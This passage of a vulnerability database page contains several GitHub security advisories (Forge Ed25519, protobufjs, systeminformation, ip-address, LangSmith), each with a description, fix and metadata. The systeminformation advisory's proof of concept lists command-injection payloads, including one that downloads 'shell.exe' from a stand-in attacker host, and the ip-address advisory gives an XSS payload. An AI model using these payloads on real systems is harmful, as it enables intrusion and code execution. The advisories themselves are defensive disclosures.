console.log(JSON.stringify(result, null, 2));\n}\n\nmain();\n```\n\u003c/details\u003e\n\n## Suggested Patch\nAdd strict canonical scalar validation in Ed25519 verify path before scalar multiplication. (Parse S as little-endian 32-byte integer and reject if `S \u003e= L`).\n\nHere is a patch we tested on our end to resolve the issue, though please verify it on your end:\n\n```diff\nindex f3e6faa..87eb709 100644\n--- a/lib/ed25519.js\n+++ b/lib/ed25519.js\n@@ -380,6 +380,10 @@ function crypto_sign_open(m, sm, n, pk) {\n return -1;\n }\n\n+ if(!_isCanonicalSignatureScalar(sm, 32)) {\n+ return -1;\n+ }\n+\n for(i = 0; i \u003c n; ++i) {\n m[i] = sm[i];\n }\n@@ -409,6 +413,21 @@ function crypto_sign_open(m, sm, n, pk) {\n return mlen;\n }\n\n+function _isCanonicalSignatureScalar(bytes, offset) {\n+ var i;\n+ // Compare little-endian scalar S against group order L and require S \u003c L.\n+ for(i = 31; i \u003e= 0; --i) {\n+ if(bytes[offset + i] \u003c L[i]) {\n+ return true;\n+ }\n+ if(bytes[offset + i] \u003e L[i]) {\n+ return false;\n+ }\n+ }\n+ // S == L is non-canonical.\n+ return false;\n+}\n+\n function modL(r, x) {\n var carry, i, j, k;\n for(i = 63; i \u003e= 32; --i) {\n```\n\n## Resources\n\n- RFC 8032 (Ed25519): https://datatracker.ietf.org/doc/html/rfc8032#section-8.4\n - \u003e Ed25519 and Ed448 signatures are not malleable due to the verification check that decoded S is smaller than l\n\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
"id": "GHSA-q67f-28xg-22rw",
"modified": "2026-03-27T21:51:06Z",
"published": "2026-03-26T22:04:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-35961"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25793"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Forge has signature forgery in Ed25519 due to missing S \u003e L check"
}
GHSA-66FF-XGX4-VCHM
Vulnerability from github – Published: 2026-05-12 15:06 – Updated: 2026-05-12 15:06Summary
protobufjs generated JavaScript for toObject conversion could include an unsafe expression derived from a schema-controlled bytes field default value. A crafted descriptor with a non-string default value for a bytes field could cause attacker-controlled code to be emitted into the generated conversion function.
Impact
An attacker who can provide or influence a protobuf descriptor may be able to execute arbitrary JavaScript in the context of the process using protobufjs.
This requires the application to load an attacker-controlled schema or descriptor and then convert a message of the affected type with defaults enabled. Applications that only use trusted, application-defined schemas are not directly affected by this issue.
Preconditions
- The application must allow an attacker to control or influence a protobuf JSON descriptor or equivalent reflected schema.
- The descriptor must define a
bytesfield with an attacker-controlled default value. - The application must call
toObjectwith defaults enabled for the affected type.
Workarounds
Do not load protobuf schemas or JSON descriptors from untrusted sources with affected versions. If untrusted schemas must be accepted, validate or restrict field options before loading them and run schema processing in an isolated environment.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.5.5"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.5.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.1"
},
"package": {
"ecosystem": "npm",
"name": "protobufjs"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44293"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:06:13Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nprotobufjs generated JavaScript for `toObject` conversion could include an unsafe expression derived from a schema-controlled `bytes` field default value. A crafted descriptor with a non-string default value for a `bytes` field could cause attacker-controlled code to be emitted into the generated conversion function.\n\n## Impact\n\nAn attacker who can provide or influence a protobuf descriptor may be able to execute arbitrary JavaScript in the context of the process using protobufjs.\n\nThis requires the application to load an attacker-controlled schema or descriptor and then convert a message of the affected type with defaults enabled. Applications that only use trusted, application-defined schemas are not directly affected by this issue.\n\n## Preconditions\n\n- The application must allow an attacker to control or influence a protobuf JSON descriptor or equivalent reflected schema.\n- The descriptor must define a `bytes` field with an attacker-controlled default value.\n- The application must call `toObject` with defaults enabled for the affected type.\n\n## Workarounds\n\nDo not load protobuf schemas or JSON descriptors from untrusted sources with affected versions. If untrusted schemas must be accepted, validate or restrict field options before loading them and run schema processing in an isolated environment.",
"id": "GHSA-66ff-xgx4-vchm",
"modified": "2026-05-12T15:06:13Z",
"published": "2026-05-12T15:06:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-66ff-xgx4-vchm"
},
{
"type": "PACKAGE",
"url": "https://github.com/protobufjs/protobuf.js"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.6"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "protobuf.js: Code injection through bytes field defaults in generated toObject code"
}
GHSA-WPHJ-FX3Q-84CH
Vulnerability from github – Published: 2025-12-16 22:37 – Updated: 2025-12-16 22:37Summary
The fsSize() function in systeminformation is vulnerable to OS Command Injection (CWE-78) on Windows systems. The optional drive parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.
Affected Platforms: Windows only
CVSS Breakdown:
- Attack Vector (AV:N): Network - if used in a web application/API
- Attack Complexity (AC:H): High - requires application to pass user input to fsSize()
- Privileges Required (PR:N): None - no authentication required at library level
- User Interaction (UI:N): None
- Scope (S:U): Unchanged - executes within Node.js process context
- Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact if exploited
Note: The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to
fsSize(), it is not vulnerable.
Details
Vulnerable Code Location
File: lib/filesystem.js, Line 197
if (_windows) {
try {
const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
util.powerShell(cmd).then((stdout, error) => {
The drive parameter is concatenated directly into the PowerShell command string without any sanitization.
Why This Is a Vulnerability
This is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using util.sanitizeShellString():
| File | Line | Function | Sanitization |
|---|---|---|---|
lib/processes.js |
141 | services() |
✅ util.sanitizeShellString(srv) |
lib/processes.js |
1006 | processLoad() |
✅ util.sanitizeShellString(proc) |
lib/network.js |
1253 | networkStats() |
✅ util.sanitizeShellString(iface) |
lib/docker.js |
472 | dockerContainerStats() |
✅ util.sanitizeShellString(containerIDs, true) |
lib/filesystem.js |
197 | fsSize() |
❌ No sanitization |
The sanitizeShellString() function (defined at lib/util.js:731) removes dangerous characters like ;, &, |, $, `, #, etc., which would prevent command injection.
PoC
Attack Scenario
An application exposes disk information via an API and passes user input to si.fsSize():
// Vulnerable application example
const si = require('systeminformation');
const http = require('http');
const url = require('url');
http.createServer(async (req, res) => {
const parsedUrl = url.parse(req.url, true);
const drive = parsedUrl.query.drive; // User-controlled input
// VULNERABLE: User input passed directly to fsSize()
const diskInfo = await si.fsSize(drive);
res.end(JSON.stringify(diskInfo));
}).listen(3000);
Exploitation
Normal Request:
GET /api/disk?drive=C:
Malicious Request (Command Injection):
GET /api/disk?drive=C:;%20whoami%20%23
Command Construction Demonstration
The following demonstrates how commands are constructed with malicious input:
Normal usage:
Input: "C:"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl
With injection payload C:; whoami #:
Input: "C:; whoami #"
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl
↑ ↑
semicolon terminates # comments out rest
first command
PowerShell will execute:
1. Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C: (original command)
2. whoami (injected command)
3. Everything after # is commented out
PoC Script
/**
* Command Injection PoC - systeminformation fsSize()
*
* Run with: node poc.js
* Requires: npm install systeminformation
*/
const os = require('os');
// Simulates the vulnerable command construction from filesystem.js:197
function simulateVulnerableCommand(drive) {
const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
return cmd;
}
// Test payloads
const payloads = [
{ name: 'Normal', input: 'C:' },
{ name: 'Command Execution', input: 'C:; whoami #' },
{ name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\\temp\\procs.txt #' },
{ name: 'Remote Payload', input: 'C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #' },
];
console.log('=== Command Injection PoC ===\n');
console.log(`Platform: ${os.platform()}`);
console.log(`Note: Actual exploitation requires Windows\n`);
payloads.forEach(p => {
console.log(`[${p.name}]`);
console.log(` Input: ${p.input}`);
console.log(` Command: ${simulateVulnerableCommand(p.input)}\n`);
});
PoC Output
=== Command Injection PoC ===
Platform: win32
Note: Actual exploitation requires Windows
[Normal]
Input: C:
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl
[Command Execution]
Input: C:; whoami #
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl
[Data Exfiltration]
Input: C:; Get-Process | Out-File C:\temp\procs.txt #
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\temp\procs.txt # | fl
[Remote Payload]
Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe #
Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\temp\shell.exe # | fl
As shown, the attacker's commands are injected directly into the PowerShell command string.
Impact
Who Is Affected?
- Applications running
systeminformationon Windows that pass user-controlled input tofsSize(drive) - Web applications, APIs, or CLI tools that accept drive letters from users
- Monitoring dashboards that allow users to specify which drives to query
Potential Attack Scenarios
- Remote Code Execution (RCE) - Execute arbitrary commands with Node.js process privileges
- Data Exfiltration - Read sensitive files and exfiltrate data
- Privilege Escalation - If Node.js runs with elevated privileges
- Lateral Movement - Use the compromised system to attack internal network
- Ransomware Deployment - Download and execute malicious payloads
Recommended Fix
Apply util.sanitizeShellString() to the drive parameter, consistent with other functions in the codebase:
if (_windows) {
try {
+ const driveSanitized = drive ? util.sanitizeShellString(drive, true) : '';
- const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl`;
+ const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? '| where -property Caption -eq ' + driveSanitized : ''} | fl`;
util.powerShell(cmd).then((stdout, error) => {
The true parameter enables strict mode which removes additional characters like spaces and parentheses.
systeminformation thanks developers working on the project. The Systeminformation Project hopes this report helps improve the its security. Please systeminformation know if any additional information or clarification is needed.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "systeminformation"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.27.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68154"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-16T22:37:23Z",
"nvd_published_at": "2025-12-16T19:16:00Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `fsSize()` function in `systeminformation` is vulnerable to **OS Command Injection (CWE-78)** on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.\n\n**Affected Platforms:** Windows only \n\n**CVSS Breakdown:**\n- **Attack Vector (AV:N):** Network - if used in a web application/API\n- **Attack Complexity (AC:H):** High - requires application to pass user input to `fsSize()`\n- **Privileges Required (PR:N):** None - no authentication required at library level\n- **User Interaction (UI:N):** None\n- **Scope (S:U):** Unchanged - executes within Node.js process context\n- **Confidentiality/Integrity/Availability (C:H/I:H/A:H):** High impact if exploited\n\n\u003e **Note:** The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable.\n\n---\n\n## Details\n\n### Vulnerable Code Location\n\n**File:** `lib/filesystem.js`, **Line 197**\n\n```javascript\nif (_windows) {\n try {\n const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? \u0027| where -property Caption -eq \u0027 + drive : \u0027\u0027} | fl`;\n util.powerShell(cmd).then((stdout, error) =\u003e {\n```\n\nThe `drive` parameter is concatenated directly into the PowerShell command string without any sanitization.\n\n### Why This Is a Vulnerability\n\nThis is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using `util.sanitizeShellString()`:\n\n| File | Line | Function | Sanitization |\n|------|------|----------|--------------|\n| `lib/processes.js` | 141 | `services()` | \u2705 `util.sanitizeShellString(srv)` |\n| `lib/processes.js` | 1006 | `processLoad()` | \u2705 `util.sanitizeShellString(proc)` |\n| `lib/network.js` | 1253 | `networkStats()` | \u2705 `util.sanitizeShellString(iface)` |\n| `lib/docker.js` | 472 | `dockerContainerStats()` | \u2705 `util.sanitizeShellString(containerIDs, true)` |\n| `lib/filesystem.js` | 197 | `fsSize()` | \u274c **No sanitization** |\n\nThe `sanitizeShellString()` function (defined at `lib/util.js:731`) removes dangerous characters like `;`, `\u0026`, `|`, `$`, `` ` ``, `#`, etc., which would prevent command injection.\n\n---\n\n## PoC\n\n### Attack Scenario\n\nAn application exposes disk information via an API and passes user input to `si.fsSize()`:\n\n```javascript\n// Vulnerable application example\nconst si = require(\u0027systeminformation\u0027);\nconst http = require(\u0027http\u0027);\nconst url = require(\u0027url\u0027);\n\nhttp.createServer(async (req, res) =\u003e {\n const parsedUrl = url.parse(req.url, true);\n const drive = parsedUrl.query.drive; // User-controlled input\n \n // VULNERABLE: User input passed directly to fsSize()\n const diskInfo = await si.fsSize(drive);\n \n res.end(JSON.stringify(diskInfo));\n}).listen(3000);\n```\n\n### Exploitation\n\n**Normal Request:**\n```\nGET /api/disk?drive=C:\n```\n\n**Malicious Request (Command Injection):**\n```\nGET /api/disk?drive=C:;%20whoami%20%23\n```\n\n### Command Construction Demonstration\n\nThe following demonstrates how commands are constructed with malicious input:\n\n**Normal usage:**\n```\nInput: \"C:\"\nCommand: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl\n```\n\n**With injection payload `C:; whoami #`:**\n```\nInput: \"C:; whoami #\"\nCommand: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl\n \u2191 \u2191\n semicolon terminates # comments out rest\n first command\n```\n\nPowerShell will execute:\n1. `Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C:` (original command)\n2. `whoami` (injected command)\n3. Everything after `#` is commented out\n\n### PoC Script\n\n```javascript\n/**\n * Command Injection PoC - systeminformation fsSize()\n * \n * Run with: node poc.js\n * Requires: npm install systeminformation\n */\n\nconst os = require(\u0027os\u0027);\n\n// Simulates the vulnerable command construction from filesystem.js:197\nfunction simulateVulnerableCommand(drive) {\n const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? \u0027| where -property Caption -eq \u0027 + drive : \u0027\u0027} | fl`;\n return cmd;\n}\n\n// Test payloads\nconst payloads = [\n { name: \u0027Normal\u0027, input: \u0027C:\u0027 },\n { name: \u0027Command Execution\u0027, input: \u0027C:; whoami #\u0027 },\n { name: \u0027Data Exfiltration\u0027, input: \u0027C:; Get-Process | Out-File C:\\\\temp\\\\procs.txt #\u0027 },\n { name: \u0027Remote Payload\u0027, input: \u0027C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\\\temp\\\\shell.exe #\u0027 },\n];\n\nconsole.log(\u0027=== Command Injection PoC ===\\n\u0027);\nconsole.log(`Platform: ${os.platform()}`);\nconsole.log(`Note: Actual exploitation requires Windows\\n`);\n\npayloads.forEach(p =\u003e {\n console.log(`[${p.name}]`);\n console.log(` Input: ${p.input}`);\n console.log(` Command: ${simulateVulnerableCommand(p.input)}\\n`);\n});\n```\n\n### PoC Output\n\n```\n=== Command Injection PoC ===\n\nPlatform: win32\nNote: Actual exploitation requires Windows\n\n[Normal]\n Input: C:\n Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl\n\n[Command Execution]\n Input: C:; whoami #\n Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl\n\n[Data Exfiltration]\n Input: C:; Get-Process | Out-File C:\\temp\\procs.txt #\n Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Get-Process | Out-File C:\\temp\\procs.txt # | fl\n\n[Remote Payload]\n Input: C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe #\n Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; Invoke-WebRequest http://attacker.com/shell.exe -OutFile C:\\temp\\shell.exe # | fl\n```\n\nAs shown, the attacker\u0027s commands are injected directly into the PowerShell command string.\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- Applications running `systeminformation` on **Windows** that pass user-controlled input to `fsSize(drive)`\n- Web applications, APIs, or CLI tools that accept drive letters from users\n- Monitoring dashboards that allow users to specify which drives to query\n\n### Potential Attack Scenarios\n\n1. **Remote Code Execution (RCE)** - Execute arbitrary commands with Node.js process privileges\n2. **Data Exfiltration** - Read sensitive files and exfiltrate data\n3. **Privilege Escalation** - If Node.js runs with elevated privileges\n4. **Lateral Movement** - Use the compromised system to attack internal network\n5. **Ransomware Deployment** - Download and execute malicious payloads\n\n---\n\n## Recommended Fix\n\nApply `util.sanitizeShellString()` to the `drive` parameter, consistent with other functions in the codebase:\n\n```diff\n if (_windows) {\n try {\n+ const driveSanitized = drive ? util.sanitizeShellString(drive, true) : \u0027\u0027;\n- const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? \u0027| where -property Caption -eq \u0027 + drive : \u0027\u0027} | fl`;\n+ const cmd = `Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${driveSanitized ? \u0027| where -property Caption -eq \u0027 + driveSanitized : \u0027\u0027} | fl`;\n util.powerShell(cmd).then((stdout, error) =\u003e {\n```\n\nThe `true` parameter enables strict mode which removes additional characters like spaces and parentheses.\n\n---\n\n`systeminformation` thanks developers working on the project. The Systeminformation Project hopes this report helps improve the its security. Please systeminformation know if any additional information or clarification is needed.",
"id": "GHSA-wphj-fx3q-84ch",
"modified": "2025-12-16T22:37:23Z",
"published": "2025-12-16T22:37:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68154"
},
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68"
},
{
"type": "PACKAGE",
"url": "https://github.com/sebhildebrandt/systeminformation"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "systeminformation has a Command Injection vulnerability in fsSize() function on Windows"
}
GHSA-V2V4-37R5-5V8G
Vulnerability from github – Published: 2026-05-05 21:50 – Updated: 2026-05-13 16:27Summary
Address6.group() and Address6.link() do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and AddressError.parseMessage (emitted by the Address6 constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to Address6 and (2) renders the output of these methods, or the thrown error's parseMessage, as HTML (e.g. via innerHTML) is vulnerable to cross-site scripting. A related issue in v6.helpers.spanAll() produced malformed markup but was not exploitable; it is hardened in the same release for consistency.
Details
Four related issues were identified and fixed together:
Address6.group(): zone ID injection. TheAddress6constructor stores the raw input (including any IPv6 zone ID) inthis.addressbefore zone stripping.group()then passedthis.addresstohelpers.simpleGroup(), which wrapped each:-separated segment in a<span>element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim.Address6.link({ prefix, className }): attribute-value injection.link()concatenated user-suppliedprefixandclassNameinto thehref="…"andclass="…"attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g.onmouseover) and achieve XSS.Address6constructor: leading-zero IPv4 error path. The leading-zero branch inparse4in6()builtAddressError.parseMessageby concatenating the raw address throughString.replace(). Becauseparse4in6()runs before the bad-character check, any characters in the groups preceding the IPv4 suffix flowed into the error's HTML unescaped. Consumers who renderparseMessageas HTML (its documented purpose — it already contains<span class="parse-error">markup) could be XSS'd by a crafted input such as<img src=x onerror=alert(1)>:10.0.01.1.v6.helpers.spanAll(): attribute-value injection (defense in depth).spanAll()embedded each character of its input into aclass="digit value-${n} …"attribute without escaping. Becausesplit('')limitsnto a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency.
Affected Versions
All versions up to and including 10.1.0.
Patched Version
10.1.1.
Impact
Real-world exposure is believed to be extremely limited. Analysis of all 425 dependent npm packages as well as GitHub code search found zero consumers of group(), link(), or spanAll(): these HTML-emitting surfaces appear to be unused across published npm packages and public repositories. Applications using only the address-parsing and comparison APIs (isValid, correctForm, isInSubnet, bigInt, etc.) are not affected.
Consumers who do render the output of group(), link(), spanAll(), or AddressError.parseMessage as HTML against untrusted input should upgrade.
PoC
const { Address6 } = require('ip-address');
const addr = new Address6('fe80::1%<img src=x onerror=alert(1)>');
document.body.innerHTML = addr.group(); // fires the onerror handler in 10.1.0
Workarounds
If users cannot upgrade immediately:
- Do not pass untrusted input to the
Address6constructor, or - Never render the output of
group(),link(), orspanAll(), nor theparseMessagefield of any thrownAddressError, as HTML; treat these values as text only, or run them through DOMPurify before inserting into the DOM (DOMPurify's default configuration preserves the library's intended<span>wrapping while stripping any injected event handlers), or - Validate input with
Address6.isValid()and reject anything that contains a zone identifier (a%character) or characters outside[0-9a-fA-F:/]before passing it to the constructor.
Lack of separate CVEs
Given the evidence that these methods are not used, and given that they are all of the same construction, maintainers do not think it's relevant or useful to create a separate CVE for each library method.
Credit
ip-address thanks @scovetta for reporting this issue.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.1.0"
},
"package": {
"ecosystem": "npm",
"name": "ip-address"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42338"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T21:50:58Z",
"nvd_published_at": "2026-05-12T20:16:41Z",
"severity": "MODERATE"
},
"details": "### Summary\n\n`Address6.group()` and `Address6.link()` do not HTML-escape attacker-controlled content before embedding it in the HTML strings they return, and `AddressError.parseMessage` (emitted by the `Address6` constructor for invalid input) can contain unescaped attacker-controlled content in one branch. An application that (1) passes untrusted input to `Address6` and (2) renders the output of these methods, or the thrown error\u0027s `parseMessage`, as HTML (e.g. via `innerHTML`) is vulnerable to cross-site scripting. A related issue in `v6.helpers.spanAll()` produced malformed markup but was not exploitable; it is hardened in the same release for consistency.\n\n### Details\n\nFour related issues were identified and fixed together:\n\n1. **`Address6.group()`: zone ID injection.** The `Address6` constructor stores the raw input (including any IPv6 zone ID) in `this.address` before zone stripping. `group()` then passed `this.address` to `helpers.simpleGroup()`, which wrapped each `:`-separated segment in a `\u003cspan\u003e` element without HTML-escaping the content. A zone ID containing HTML markup was embedded verbatim.\n2. **`Address6.link({ prefix, className })`: attribute-value injection.** `link()` concatenated user-supplied `prefix` and `className` into the `href=\"\u2026\"` and `class=\"\u2026\"` attributes without escaping. A caller passing untrusted content through these options could inject event handlers (e.g. `onmouseover`) and achieve XSS.\n3. **`Address6` constructor: leading-zero IPv4 error path.** The leading-zero branch in `parse4in6()` built `AddressError.parseMessage` by concatenating the raw address through `String.replace()`. Because `parse4in6()` runs before the bad-character check, any characters in the groups preceding the IPv4 suffix flowed into the error\u0027s HTML unescaped. Consumers who render `parseMessage` as HTML (its documented purpose \u2014 it already contains `\u003cspan class=\"parse-error\"\u003e` markup) could be XSS\u0027d by a crafted input such as `\u003cimg src=x onerror=alert(1)\u003e:10.0.01.1`.\n4. **`v6.helpers.spanAll()`: attribute-value injection (defense in depth).** `spanAll()` embedded each character of its input into a `class=\"digit value-${n} \u2026\"` attribute without escaping. Because `split(\u0027\u0027)` limits `n` to a single character this was not exploitable in practice, but it produced malformed markup and is fixed for consistency.\n\n### Affected Versions\n\nAll versions up to and including `10.1.0`.\n\n### Patched Version\n\n`10.1.1`.\n\n### Impact\n\nReal-world exposure is believed to be extremely limited. Analysis of all 425 dependent npm packages as well as GitHub code search found zero consumers of `group()`, `link()`, or `spanAll()`: these HTML-emitting surfaces appear to be unused across published npm packages and public repositories. Applications using only the address-parsing and comparison APIs (`isValid`, `correctForm`, `isInSubnet`, `bigInt`, etc.) are not affected.\n\nConsumers who **do** render the output of `group()`, `link()`, `spanAll()`, or `AddressError.parseMessage` as HTML against untrusted input should upgrade.\n\n### PoC\n\n```javascript\nconst { Address6 } = require(\u0027ip-address\u0027);\nconst addr = new Address6(\u0027fe80::1%\u003cimg src=x onerror=alert(1)\u003e\u0027);\ndocument.body.innerHTML = addr.group(); // fires the onerror handler in 10.1.0\n```\n\n### Workarounds\n\nIf users cannot upgrade immediately:\n\n- Do not pass untrusted input to the `Address6` constructor, or\n- Never render the output of `group()`, `link()`, or `spanAll()`, nor the `parseMessage` field of any thrown `AddressError`, as HTML; treat these values as text only, or run them through [DOMPurify](https://github.com/cure53/DOMPurify) before inserting into the DOM (DOMPurify\u0027s default configuration preserves the library\u0027s intended `\u003cspan\u003e` wrapping while stripping any injected event handlers), or\n- Validate input with `Address6.isValid()` and reject anything that contains a zone identifier (a `%` character) or characters outside `[0-9a-fA-F:/]` before passing it to the constructor.\n\n### Lack of separate CVEs\n\nGiven the evidence that these methods are not used, and given that they are all of the same construction, maintainers do not think it\u0027s relevant or useful to create a separate CVE for each library method.\n\n### Credit\n\nip-address thanks @scovetta for reporting this issue.",
"id": "GHSA-v2v4-37r5-5v8g",
"modified": "2026-05-13T16:27:24Z",
"published": "2026-05-05T21:50:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/beaugunderson/ip-address/security/advisories/GHSA-v2v4-37r5-5v8g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42338"
},
{
"type": "PACKAGE",
"url": "https://github.com/beaugunderson/ip-address"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "ip-address has XSS in Address6 HTML-emitting methods"
}
GHSA-3644-Q5CJ-C5C7
Vulnerability from github – Published: 2026-05-13 15:29 – Updated: 2026-06-08 23:54Description
The LangSmith SDK's prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) fetch and deserialize prompt manifests from the LangSmith Hub. These manifests may contain serialized LangChain objects and model configuration that affect runtime behavior. When pulling a public prompt by owner/name identifier, the manifest content is controlled by an external party, but prior versions of the SDK did not distinguish this from pulling a prompt within the caller's own organization.
Prompt manifests can intentionally configure a model with a custom base URL, default headers, model name, or other constructor arguments. These are supported features, but they also mean the prompt contents should be treated as executable configuration rather than plain text. A prompt can also include serialized LangChain Runnable or PromptTemplate objects with attacker-controlled constructor kwargs, or secret references that, if secrets_from_env is enabled, read environment variables at deserialization time.
Applications are exposed when all of the following are true:
- The application calls
pull_promptorpull_prompt_commit(Python) orpullPromptorpullPromptCommit(JS/TS) with a publicowner/nameprompt identifier. - The prompt was published or modified by an untrusted or compromised account.
- The application uses the pulled prompt without independently validating its contents.
